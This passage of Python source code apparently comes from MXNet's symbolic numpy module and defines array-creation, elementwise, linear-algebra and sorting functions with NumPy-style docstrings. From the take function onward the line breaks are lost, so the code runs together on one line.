        default dtype, because `float32` is considered as the default data type in deep
        learning.
    order : {'C'}, optional, default: 'C'
        How to store multi-dimensional data in memory, currently only row-major
        (C-style) is supported.
    ctx : Context, optional
        An optional device context (default is the current default context).

    Returns
    -------
    out : Symbol
        Array of zeros with the given shape, dtype, and ctx.
    """
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    # Python's builtin `float` (and None) map to MXNet's configurable default
    # dtype: float64 when npx.is_np_default_dtype() is True, else float32.
    if dtype is None or dtype is float:
        dtype = _np.float64 if is_np_default_dtype() else _np.float32
    return _npi.zeros(shape=shape, ctx=ctx, dtype=dtype)


@set_module('mxnet.symbol.numpy')
def ones(shape, dtype=None, order='C', ctx=None):
    """Return a new array of given shape and type, filled with ones.
    This function currently only supports storing multi-dimensional data
    in row-major (C-style).

    Parameters
    ----------
    shape : int or tuple of int
        The shape of the empty array.
    dtype : str or numpy.dtype, optional
        An optional value type.
        When npx.is_np_default_dtype() returns False, default dtype is float32;
        When npx.is_np_default_dtype() returns True, default dtype is float64.
        Note that this behavior is different from NumPy's `ones` function where
        `float64` is the default value.
    order : {'C'}, optional, default: 'C'
        How to store multi-dimensional data in memory, currently only row-major
        (C-style) is supported.
    ctx : Context, optional
        An optional device context (default is the current default context).

    Returns
    -------
    out : _Symbol
        Array of ones with the given shape, dtype, and ctx.
    """
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    # dtype=None is passed through; the backend operator resolves the default.
    return _npi.ones(shape=shape, ctx=ctx, dtype=dtype)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def invert(x, out=None, **kwargs):
    r"""
    Compute bit-wise inversion, or bit-wise NOT, element-wise.
    Computes the bit-wise NOT of the underlying binary representation of
    the integers in the input arrays. This ufunc implements the C/Python
    operator ``~``.

    Parameters
    ----------
    x : array_like
        Only integer and boolean types are handled.
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.
        A tuple (possible only as a keyword argument) must have length equal
        to the number of outputs.

    Returns
    -------
    out : ndarray or scalar
        Result.
        This is a scalar if `x` is a scalar.

    See Also
    --------
    bitwise_and, bitwise_or, bitwise_xor
    logical_not
    binary_repr :
        Return the binary representation of the input number as a string.

    Examples
    --------
    We've seen that 13 is represented by ``00001101``.
    The invert or bit-wise NOT of 13 is then:

    >>> x = np.invert(np.array(13, dtype=np.uint8))
    >>> x
    242
    >>> np.binary_repr(x, width=8)
    '11110010'

    Notes
    -----
    `bitwise_not` is an alias for `invert`:

    >>> np.bitwise_not is np.invert
    True
    """
    return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
@wrap_np_unary_func
def bitwise_not(x, out=None, **kwargs):
    r"""
    Compute bit-wise inversion, or bit-wise NOT, element-wise.
    Computes the bit-wise NOT of the underlying binary representation of
    the integers in the input arrays. This ufunc implements the C/Python
    operator ``~``.

    Parameters
    ----------
    x : array_like
        Only integer and boolean types are handled.
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.
        A tuple (possible only as a keyword argument) must have length equal
        to the number of outputs.

    Returns
    -------
    out : ndarray or scalar
        Result.
        This is a scalar if `x` is a scalar.

    See Also
    --------
    bitwise_and, bitwise_or, bitwise_xor
    logical_not
    binary_repr :
        Return the binary representation of the input number as a string.

    Examples
    --------
    We've seen that 13 is represented by ``00001101``.
    The invert or bit-wise NOT of 13 is then:

    >>> x = np.invert(np.array(13, dtype=np.uint8))
    >>> x
    242
    >>> np.binary_repr(x, width=8)
    '11110010'

    Notes
    -----
    `bitwise_not` is an alias for `invert`:

    >>> np.bitwise_not is np.invert
    True
    """
    # Same implementation as `invert` above; the two names are aliases.
    return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)


@set_module('mxnet.symbol.numpy')
def broadcast_to(array, shape):
    """
    Broadcast an array to a new shape.

    Parameters
    ----------
    array : _Symbol or scalar
        The array to broadcast.
    shape : tuple
        The shape of the desired array.

    Returns
    -------
    broadcast : array
        A readonly view on the original array with the given shape. It is
        typically not contiguous. Furthermore, more than one element of a
        broadcasted array may refer to a single memory location.

    Raises
    ------
    MXNetError
        If the array is not compatible with the new shape according to NumPy's
        broadcasting rules.
    """
    # A bare scalar has no symbol handle; materialize it via `full` instead.
    if _np.isscalar(array):
        return full(shape, array)
    return _npi.broadcast_to(array, shape)


@set_module('mxnet.symbol.numpy')
def full(shape, fill_value, dtype=None, order='C', ctx=None, out=None):  # pylint: disable=too-many-arguments
    """
    Return a new array of given shape and type, filled with `fill_value`.

    Parameters
    ----------
    shape : int or sequence of ints
        Shape of the new array, e.g., ``(2, 3)`` or ``2``.
    fill_value : scalar or _Symbol
        Fill value.
    dtype : data-type, optional
        When npx.is_np_default_dtype() returns False, default dtype is float32;
        When npx.is_np_default_dtype() returns True, default dtype is float64.
        The desired data-type for the array. The default, `None`, means
        `np.array(fill_value).dtype`.
    order : {'C'}, optional
        Whether to store multidimensional data in C- or Fortran-contiguous
        (row- or column-wise) order in memory. Currently only supports C order.
    ctx: to specify the device, e.g. the i-th GPU.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray
        Array of `fill_value` with the given shape, dtype, and order.

    Notes
    -----
    This function differs from the original `numpy.full
    https://docs.scipy.org/doc/numpy/reference/generated/numpy.full.html`_ in
    the following way(s):

    - Have an additional `ctx` argument to specify the device
    - Have an additional `out` argument
    - Currently does not support `order` selection

    See Also
    --------
    empty : Return a new uninitialized array.
    ones : Return a new array setting values to one.
    zeros : Return a new array setting values to zero.

    Examples
    --------
    >>> np.full((2, 2), 10)
    array([[10., 10.],
           [10., 10.]])
    >>> np.full((2, 2), 2, dtype=np.int32, ctx=mx.cpu(0))
    array([[2, 2],
           [2, 2]], dtype=int32)
    """
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    # A symbolic fill value cannot be baked into the operator; broadcast it
    # to the requested shape (and cast if an explicit dtype was given).
    if isinstance(fill_value, Symbol):
        if dtype is None:
            ret = broadcast_to(fill_value, shape)
        else:
            ret = broadcast_to(fill_value, shape).astype(dtype)
        return ret
    if isinstance(fill_value, bool):
        fill_value = int(fill_value)
        dtype = _np.bool if dtype is None else dtype
    return _npi.full(shape=shape, value=fill_value, ctx=ctx, dtype=dtype, out=out)


@set_module('mxnet.symbol.numpy')
def full_like(a, fill_value, dtype=None, order='C', ctx=None, out=None):  # pylint: disable=too-many-arguments
    """
    Return a full array with the same shape and type as a given array.

    Parameters
    ----------
    a : _Symbol
        The shape and data-type of `a` define these same attributes of
        the returned array.
    fill_value : scalar
        Fill value.
    dtype : data-type, optional
        Overrides the data type of the result.
        Temporarily do not support boolean type.
    order : {'C'}, optional
        Whether to store multidimensional data in C- or Fortran-contiguous
        (row- or column-wise) order in memory. Currently only supports C order.
    ctx: to specify the device, e.g. the i-th GPU.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol
        Array `fill_value` with the same shape and type as `a`.

    See Also
    --------
    empty_like : Return an empty array with shape and type of input.
    ones_like : Return an array of ones with shape and type of input.
    zeros_like : Return an array of zeros with shape and type of input.
    full : Return a new array of given shape filled with value.
    """
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    # Booleans are passed to the backend as 0/1 integers.
    if isinstance(fill_value, bool):
        fill_value = int(fill_value)
    return _npi.full_like(a, fill_value=fill_value, ctx=ctx, dtype=dtype, out=out)


@set_module('mxnet.symbol.numpy')
def zeros_like(a, dtype=None, order='C', ctx=None, out=None):  # pylint: disable=too-many-arguments
    """
    Return an array of zeros with the same shape and type as a given array.

    Parameters
    ----------
    a : _Symbol
        The shape and data-type of `a` define these same attributes of
        the returned array.
    dtype : data-type, optional
        Overrides the data type of the result.
        Temporarily do not support boolean type.
    order : {'C'}, optional
        Whether to store multidimensional data in C- or Fortran-contiguous
        (row- or column-wise) order in memory. Currently only supports C order.
    ctx: to specify the device, e.g. the i-th GPU.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol
        Array of zeros with the same shape and type as `a`.

    See Also
    --------
    empty_like : Return an empty array with shape and type of input.
    ones_like : Return an array of ones with shape and type of input.
    zeros_like : Return an array of zeros with shape and type of input.
    zeros : Return a new array of given shape filled with zeros.
    """
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    # Implemented as full_like with a constant fill value of 0.
    return _npi.full_like(a, fill_value=0, ctx=ctx, dtype=dtype, out=out)


@set_module('mxnet.symbol.numpy')
def ones_like(a, dtype=None, order='C', ctx=None, out=None):  # pylint: disable=too-many-arguments
    """
    Return an array of ones with the same shape and type as a given array.

    Parameters
    ----------
    a : _Symbol
        The shape and data-type of `a` define these same attributes of
        the returned array.
    dtype : data-type, optional
        Overrides the data type of the result.
        Temporarily do not support boolean type.
    order : {'C'}, optional
        Whether to store multidimensional data in C- or Fortran-contiguous
        (row- or column-wise) order in memory. Currently only supports C order.
    ctx: to specify the device, e.g. the i-th GPU.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol
        Array of ones with the same shape and type as `a`.

    See Also
    --------
    empty_like : Return an empty array with shape and type of input.
    ones_like : Return an array of ones with shape and type of input.
    zeros_like : Return an array of zeros with shape and type of input.
    zeros : Return a new array of given shape filled with zeros.
    """
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    # Implemented as full_like with a constant fill value of 1.
    return _npi.full_like(a, fill_value=1, ctx=ctx, dtype=dtype, out=out)


@set_module('mxnet.symbol.numpy')
def identity(n, dtype=None, ctx=None):
    """
    Return the identity array.

    The identity array is a square array with ones on the main diagonal.

    Parameters
    ----------
    n : int
        Number of rows (and columns) in `n` x `n` output.
    dtype : data-type, optional
        Data-type of the output.
        When npx.is_np_default_dtype() returns False, default dtype is float32;
        When npx.is_np_default_dtype() returns True, default dtype is float64.
    ctx : Context, optional
        An optional device context (default is the current default context).

    Returns
    -------
    out : _Symbol
        `n` x `n` array with its main diagonal set to one,
        and all other elements 0.
    """
    if not isinstance(n, int):
        raise TypeError("Input 'n' should be an integer")
    if n < 0:
        raise ValueError("Input 'n' cannot be negative")
    if ctx is None:
        ctx = current_context()
    return _npi.identity(shape=(n, n), ctx=ctx, dtype=dtype)


# pylint: disable=redefined-outer-name
@set_module('mxnet.symbol.numpy')
def take(a, indices, axis=None, mode='raise', out=None):
    r"""
    Take elements from an array along an axis.

    When axis is not None, this function does the same thing as "fancy"
    indexing (indexing arrays using arrays); however, it can be easier to use
    if you need elements along a given axis. A call such as
    ``np.take(arr, indices, axis=3)`` is equivalent to
    ``arr[:,:,:,indices,...]``.

    Explained without fancy indexing, this is equivalent to the following use
    of `ndindex`, which sets each of ``ii``, ``jj``, and ``kk`` to a tuple of
    indices::

        Ni, Nk = a.shape[:axis], a.shape[axis+1:]
        Nj = indices.shape
        for ii in ndindex(Ni):
            for jj in ndindex(Nj):
                for kk in ndindex(Nk):
                    out[ii + jj + kk] = a[ii + (indices[jj],) + kk]

    Parameters
    ----------
    a : _Symbol
        The source array.
    indices : _Symbol
        The indices of the values to extract. Also allow scalars for indices.
    axis : int, optional
        The axis over which to select values. By default, the flattened
        input array is used.
    out : _Symbol or None, optional
        Dummy parameter to keep the consistency with the ndarray counterpart.
    mode : {'clip', 'wrap'}, optional
        Specifies how out-of-bounds indices will behave.

        * 'clip' -- clip to the range (default)
        * 'wrap' -- wrap around

        'clip' mode means that all indices that are too large are replaced
        by the index that addresses the last element along that axis.
Note that this disables indexing with negative numbers. Returns ------- out : _Symbol The returned array has the same type as `a`. Notes ----- This function differs from the original `numpy.take <https://docs.scipy.org/doc/numpy/reference/generated/numpy.take.html>`_ in the following way(s): - Only ndarray or scalar ndarray is accepted as valid input. """ if mode not in ('wrap', 'clip', 'raise'): raise NotImplementedError( "function take does not support mode '{}'".format(mode)) if axis is None: return _npi.take(_npi.reshape(a, -1), indices, 0, mode, out) else: return _npi.take(a, indices, axis, mode, out) # pylint: enable=redefined-outer-name #pylint: disable= too-many-arguments, no-member, protected-access def _ufunc_helper(lhs, rhs, fn_array, fn_scalar, lfn_scalar, rfn_scalar=None, out=None): """ Helper function for element-wise operation. The function will perform numpy-like broadcasting if needed and call different functions. Parameters -------- lhs : Symbol or numeric value Left-hand side operand. rhs : Symbol or numeric value Right-hand operand, fn_array : function Function to be called if both lhs and rhs are of ``Symbol`` type. fn_scalar : function Function to be called if both lhs and rhs are numeric values. 
lfn_scalar : function Function to be called if lhs is ``Symbol`` while rhs is numeric value rfn_scalar : function Function to be called if lhs is numeric value while rhs is ``Symbol``; if none is provided, then the function is commutative, so rfn_scalar is equal to lfn_scalar Returns -------- mxnet.numpy.ndarray result array """ if isinstance(lhs, numeric_types): if isinstance(rhs, numeric_types): return fn_scalar(lhs, rhs, out=out) else: is_int = isinstance(rhs, integer_types) if rfn_scalar is None: # commutative function return lfn_scalar(rhs, scalar=float(lhs), is_int=is_int, out=out) else: return rfn_scalar(rhs, scalar=float(lhs), is_int=is_int, out=out) elif isinstance(rhs, numeric_types): is_int = isinstance(rhs, integer_types) return lfn_scalar(lhs, scalar=float(rhs), is_int=is_int, out=out) elif isinstance(rhs, Symbol): return fn_array(lhs, rhs, out=out) else: raise TypeError('type %s not supported' % str(type(rhs))) #pylint: enable= too-many-arguments, no-member, protected-access @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def add(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.add, _np.add, _npi.add_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def subtract(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.subtract, _np.subtract, _npi.subtract_scalar, _npi.rsubtract_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def multiply(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.multiply, _np.multiply, _npi.multiply_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def divide(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar, _npi.rtrue_divide_scalar, out) @set_module('mxnet.symbol.numpy') def true_divide(x1, x2, out=None): return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar, _npi.rtrue_divide_scalar, out) @set_module('mxnet.symbol.numpy') 
@wrap_np_binary_func def mod(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def fmod(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.fmod, _np.fmod, _npi.fmod_scalar, _npi.rfmod_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def remainder(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def power(x1, x2, out=None, **kwargs): return _ufunc_helper(x1, x2, _npi.power, _np.power, _npi.power_scalar, _npi.rpower_scalar, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def gcd(x1, x2, out=None, **kwargs): """ Returns the greatest common divisor of ``|x1|`` and ``|x2|`` Parameters ---------- x1, x2 : ndarrays or scalar values The arrays for computing greatest common divisor. If x1.shape != x2.shape, they must be broadcastable to a common shape (which may be the shape of one or the other). out : ndarray or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned. Returns ------- y : ndarray or scalar The greatest common divisor of the absolute value of the inputs This is a scalar if both `x1` and `x2` are scalars. See Also -------- lcm : The lowest common multiple """ return _ufunc_helper(x1, x2, _npi.gcd, _np.gcd, _npi.gcd_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def matmul(a, b, out=None, **kwargs): """ Matrix product of two arrays. Parameters ---------- a, b : _Symbol. out : _Symbol, optional A location into which the result is stored. If provided, it must have a shape that matches the signature (n,k),(k,m)->(n,m). If not provided or None, a freshly-allocated array is returned. 
Returns ------- y : _Symbol The matrix product of the inputs. This is a scalar only when both x1, x2 are 1-d vectors. Raises ------ MXNetError If the last dimension of a is not the same size as the second-to-last dimension of b. If a scalar value is passed in. See Also -------- tensordot : Sum products over arbitrary axes. dot : alternative matrix product with different broadcasting rules. einsum : Einstein summation convention. Notes ----- The behavior depends on the arguments in the following way. - If both arguments are 2-D they are multiplied like conventional matrices. - If either argument is N-D, N > 2, it is treated as a stack of matrices residing in the last two indexes and broadcast accordingly. - If the first argument is 1-D, it is promoted to a matrix by prepending a 1 to its dimensions. After matrix multiplication the prepended 1 is removed. - If the second argument is 1-D, it is promoted to a matrix by appending a 1 to its dimensions. After matrix multiplication the appended 1 is removed. matmul differs from dot in two important ways: - Multiplication by scalars is not allowed, use multiply instead. - Stacks of matrices are broadcast together as if the matrices were elements, respecting the signature (n,k),(k,m)->(n,m). """ return _npi.matmul(a, b, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def lcm(x1, x2, out=None, **kwargs): """ Returns the lowest common multiple of ``|x1|`` and ``|x2|`` Parameters ---------- x1, x2 : _Symbols or scalar values The arrays for computing lowest common multiple. If x1.shape != x2.shape, they must be broadcastable to a common shape (which may be the shape of one or the other). out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned. 
Returns ------- y : _Symbol or scalar The lowest common multiple of the absolute value of the inputs This is a scalar if both `x1` and `x2` are scalars. See Also -------- gcd : The greatest common divisor """ return _ufunc_helper(x1, x2, _npi.lcm, _np.lcm, _npi.lcm_scalar, None, out) @set_module('mxnet.symbol.numpy') def argsort(a, axis=-1, kind=None, order=None): """ Returns the indices that would sort an array. Perform an indirect sort along the given axis using the algorithm specified by the `kind` keyword. It returns an array of indices of the same shape as `a` that index data along the given axis in sorted order. Parameters ---------- a : _Symbol Array to sort. axis : int or None, optional Axis along which to sort. The default is -1 (the last axis). If None, the flattened array is used. kind : string, optional This argument can take any string, but it does not have any effect on the final result. order : str or list of str, optional Not supported yet, will raise NotImplementedError if not None. Returns ------- index_array : _Symbol, int Array of indices that sort `a` along the specified `axis`. If `a` is one-dimensional, ``a[index_array]`` yields a sorted `a`. More generally, ``np.take_along_axis(a, index_array, axis=axis)`` always yields the sorted `a`, irrespective of dimensionality. Notes ----- This operator does not support different sorting algorithms. """ if order is not None: raise NotImplementedError("order is not supported yet...") return _npi.argsort(data=a, axis=axis, is_ascend=True, dtype='int64') @set_module('mxnet.symbol.numpy') def sort(a, axis=-1, kind=None, order=None): """ Return a sorted copy of an array. Parameters ---------- a : _Symbol Array to be sorted. axis : int or None, optional Axis along which to sort. The default is -1 (the last axis). If None, the flattened array is used. kind : string, optional This argument can take any string, but it does not have any effect on the final result. 
order : str or list of str, optional Not supported yet, will raise NotImplementedError if not None. Returns ------- sorted_array : ndarray Array of the same type and shape as `a`. Notes ----- This operator does not support different sorting algorithms. """ if order is not None: raise NotImplementedError("order is not supported yet...") return _npi.sort(data=a, axis=axis, is_ascend=True) @set_module('mxnet.symbol.numpy') def dot(a, b, out=None): """ Dot product of two arrays. Specifically, - If both `a` and `b` are 1-D arrays, it is inner product of vectors - If both `a` and `b` are 2-D arrays, it is matrix multiplication, - If either `a` or `b` is 0-D (scalar), it is equivalent to :func:`multiply` and using ``np.multiply(a, b)`` or ``a * b`` is preferred. - If `a` is an N-D array and `b` is a 1-D array, it is a sum product over the last axis of `a` and `b`. - If `a` is an N-D array and `b` is a 2-D array, it is a sum product over the last axis of `a` and the second-to-last axis of `b`:: dot(a, b)[i,j,k] = sum(a[i,j,:] * b[:,k]) Parameters ---------- a : _Symbol First argument. b : _Symbol Second argument. out : _Symbol, optional Output argument. It must have the same shape and type as the expected output. Returns ------- output : _Symbol Returns the dot product of `a` and `b`. If `a` and `b` are both scalars or both 1-D arrays then a scalar is returned; otherwise an array is returned. If `out` is given, then it is returned Examples -------- >>> a = np.array(3) >>> b = np.array(4) >>> np.dot(a, b) array(12.) For 2-D arrays it is the matrix product: >>> a = np.array([[1, 0], [0, 1]]) >>> b = np.array([[4, 1], [2, 2]]) >>> np.dot(a, b) array([[4., 1.], [2., 2.]]) >>> a = np.arange(3*4*5*6).reshape((3,4,5,6)) >>> b = np.arange(5*6)[::-1].reshape((6,5)) >>> np.dot(a, b)[2,3,2,2] array(29884.) >>> np.sum(a[2,3,2,:] * b[:,2]) array(29884.) 
""" return _npi.dot(a, b, out=out) @set_module('mxnet.symbol.numpy') def tensordot(a, b, axes=2): r""" tensordot(a, b, axes=2) Compute tensor dot product along specified axes for arrays >= 1-D. Given two tensors (arrays of dimension greater than or equal to one), `a` and `b`, and an ndarray object containing two ndarray objects, ``(a_axes, b_axes)``, sum the products of `a`'s and `b`'s elements (components) over the axes specified by ``a_axes`` and ``b_axes``. The third argument can be a single non-negative integer_like scalar, ``N``; if it is such, then the last ``N`` dimensions of `a` and the first ``N`` dimensions of `b` are summed over. Parameters ---------- a, b : _Symbol Tensors to "dot". axes : int or (2,) ndarray * integer_like If an int N, sum over the last N axes of `a` and the first N axes of `b` in order. The sizes of the corresponding axes must match. * (2,) array_like Or, a list of axes to be summed over, first sequence applying to `a`, second to `b`. Both elements array_like must be of the same length. Notes ----- Three common use cases are: * ``axes = 0`` : tensor product :math:`a\otimes b` * ``axes = 1`` : tensor dot product :math:`a\cdot b` * ``axes = 2`` : (default) tensor double contraction :math:`a:b` When `axes` is integer_like, the sequence for evaluation will be: first the -Nth axis in `a` and 0th axis in `b`, and the -1th axis in `a` and Nth axis in `b` last. When there is more than one axis to sum over - and they are not the last (first) axes of `a` (`b`) - the argument `axes` should consist of two sequences of the same length, with the first axis to sum over given first in both sequences, the second axis second, and so forth. 
""" if _np.isscalar(axes): return _npi.tensordot_int_axes(a, b, axes) if len(axes) != 2: raise ValueError('Axes must consist of two arrays.') a_axes_summed, b_axes_summed = axes if _np.isscalar(a_axes_summed): a_axes_summed = (a_axes_summed,) if _np.isscalar(b_axes_summed): b_axes_summed = (b_axes_summed,) if len(a_axes_summed) != len(b_axes_summed): raise ValueError('Axes length mismatch') return _npi.tensordot(a, b, a_axes_summed, b_axes_summed) @set_module('mxnet.symbol.numpy') def histogram(a, bins=10, range=None, normed=None, weights=None, density=None): # pylint: disable= too-many-arguments """ Compute the histogram of a set of data. Parameters ---------- a : Symbol Input data. The histogram is computed over the flattened array. bins : int or Symbol If `bins` is an int, it defines the number of equal-width bins in the given range (10, by default). If `bins` is a sequence, it defines a monotonically increasing array of bin edges, including the rightmost edge, allowing for non-uniform bin widths. .. versionadded:: 1.11.0 If `bins` is a string, it defines the method used to calculate the optimal bin width, as defined by `histogram_bin_edges`. range : (float, float) The lower and upper range of the bins. Required when `bins` is an integer. Values outside the range are ignored. The first element of the range must be less than or equal to the second. normed : bool, optional Not supported yet, coming soon. weights : array_like, optional Not supported yet, coming soon. density : bool, optional Not supported yet, coming soon. 
""" if normed is True: raise NotImplementedError("normed is not supported yet...") if weights is not None: raise NotImplementedError("weights is not supported yet...") if density is True: raise NotImplementedError("density is not supported yet...") if isinstance(bins, numeric_types): if range is None: raise NotImplementedError("automatic range is not avaialble yet...") return _npi.histogram(a, bin_cnt=bins, range=range) if isinstance(bins, (list, tuple)): raise NotImplementedError("array_like bins is not supported yet...") if isinstance(bins, str): raise NotImplementedError("string bins is not supported yet...") if isinstance(bins, Symbol): return _npi.histogram(a, bins) raise ValueError("histogram fails with", locals()) @set_module('mxnet.symbol.numpy') def eye(N, M=None, k=0, dtype=float, **kwargs): """ Return a 2-D array with ones on the diagonal and zeros elsewhere. Parameters ---------- N : int Number of rows in the output. M : int, optional Number of columns in the output. If None, defaults to N. k : int, optional Index of the diagonal: 0 (the default) refers to the main diagonal, a positive value refers to an upper diagonal, and a negative value to a lower diagonal. dtype : data-type, optional Data-type of the returned array. When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. Returns ------- I : _Symbol of shape (N,M) An array where all elements are equal to zero, except for the k-th diagonal, whose values are equal to one. 
""" _sanity_check_params('eye', ['order'], kwargs) ctx = kwargs.pop('ctx', current_context()) if ctx is None: ctx = current_context() if dtype is None or dtype is float: dtype = _np.float64 if is_np_default_dtype() else _np.float32 return _npi.eye(N, M, k, ctx, dtype) @set_module('mxnet.symbol.numpy') def empty_like(prototype, dtype=None, order='C', subok=False, shape=None): # pylint: disable=W0621 """ Return a new array with the same shape and type as a given array. Parameters ---------- prototype : _Symbol The shape and data-type of `prototype` define these same attributes of the returned array. dtype : data-type, optional Overrides the data type of the result. order : {'C'}, optional Whether to store multidimensional data in C- or Fortran-contiguous (row- or column-wise) order in memory. Currently only supports C order. subok : bool, optional. If True, then the newly created array will use the sub-class type of 'a', otherwise it will be a base-class array. Defaults to False. (Only support False at this moment) shape : int or sequence of ints, optional. Overrides the shape of the result. If order='K' and the number of dimensions is unchanged, will try to keep order, otherwise, order='C' is implied. (This parameter is not supported at this moment) Returns ------- out : _Symbol Array of uninitialized (arbitrary) data with the same shape and type as `prototype`. See Also -------- ones_like : Return an array of ones with shape and type of input. zeros_like : Return an array of zeros with shape and type of input. full_like : Return a new array with shape of input filled with value. empty : Return a new uninitialized array. Notes ----- This function does *not* initialize the returned array; to do that use `zeros_like` or `ones_like` instead. It may be marginally faster than the functions that do set the array values. 
""" dtype_list = {None:'None', _np.int8:'int8', _np.uint8:'uint8', _np.int32:'int32', _np.int64:'int64', _np.float16:'float16', _np.float32:'float32', _np.float64:'float64', _np.bool_:'bool_', bool:'bool', int:'int64', float:'float64'} if order != 'C': raise NotImplementedError("Only support C order at this moment") if subok: raise NotImplementedError("Creating array by using sub-class is not supported at this moment") if shape is not None: raise NotImplementedError("Parameter 'shape' is not supported at this moment") try: dtype = dtype if isinstance(dtype, str) else dtype_list[dtype] except: raise NotImplementedError("Do not support this dtype at this moment") return _npi.empty_like_fallback(prototype, dtype=dtype, order=order, subok=subok, shape=shape) @set_module('mxnet.symbol.numpy') def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None, axis=0, ctx=None): # pylint: disable=too-many-arguments r""" Return evenly spaced numbers over a specified interval. Returns num evenly spaced samples, calculated over the interval [start, stop]. The endpoint of the interval can optionally be excluded. Parameters ---------- start : real number The starting value of the sequence. stop : real number The end value of the sequence, unless endpoint is set to False. In that case, the sequence consists of all but the last of num + 1 evenly spaced samples, so that stop is excluded. Note that the step size changes when endpoint is False. num : int, optional Number of samples to generate. Default is 50. Must be non-negative. endpoint : bool, optional If True, stop is the last sample. Otherwise, it is not included. Default is True. retstep : bool, optional If True, return (samples, step), where step is the spacing between samples. dtype : dtype, optional The type of the output array. If dtype is not given, infer the data type from the other input arguments. axis : int, optional The axis in the result to store the samples. Relevant only if start or stop are array-like. 
By default (0), the samples will be along a new axis inserted at the beginning. Use -1 to get an axis at the end. Returns ------- samples : _Symbol There are num equally spaced samples in the closed interval `[start, stop]` or the half-open interval `[start, stop)` (depending on whether endpoint is True or False). step : float, optional Only returned if retstep is True Size of spacing between samples. See Also -------- arange : Similar to `linspace`, but uses a step size (instead of the number of samples). Notes ----- This function differs from the original `numpy.linspace <https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html>`_ in the following aspects: - `start` and `stop` do not support list, numpy ndarray and mxnet ndarray - axis could only be 0 - There could be an additional `ctx` argument to specify the device, e.g. the i-th GPU. """ if isinstance(start, (list, _np.ndarray)) or isinstance(stop, (list, _np.ndarray)): raise NotImplementedError('start and stop only support int') if axis != 0: raise NotImplementedError("the function only support axis 0") if ctx is None: ctx = current_context() if retstep: step = (stop - start) / (num - 1) return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype), step else: return _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype) @set_module('mxnet.symbol.numpy') def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None, axis=0, ctx=None): # pylint: disable=too-many-arguments r"""Return numbers spaced evenly on a log scale. In linear space, the sequence starts at ``base ** start`` (`base` to the power of `start`) and ends with ``base ** stop`` (see `endpoint` below). Non-scalar `start` and `stop` are now supported. Parameters ---------- start : scalar ``base ** start`` is the starting value of the sequence. stop : scalar ``base ** stop`` is the final value of the sequence, unless `endpoint` is False. 
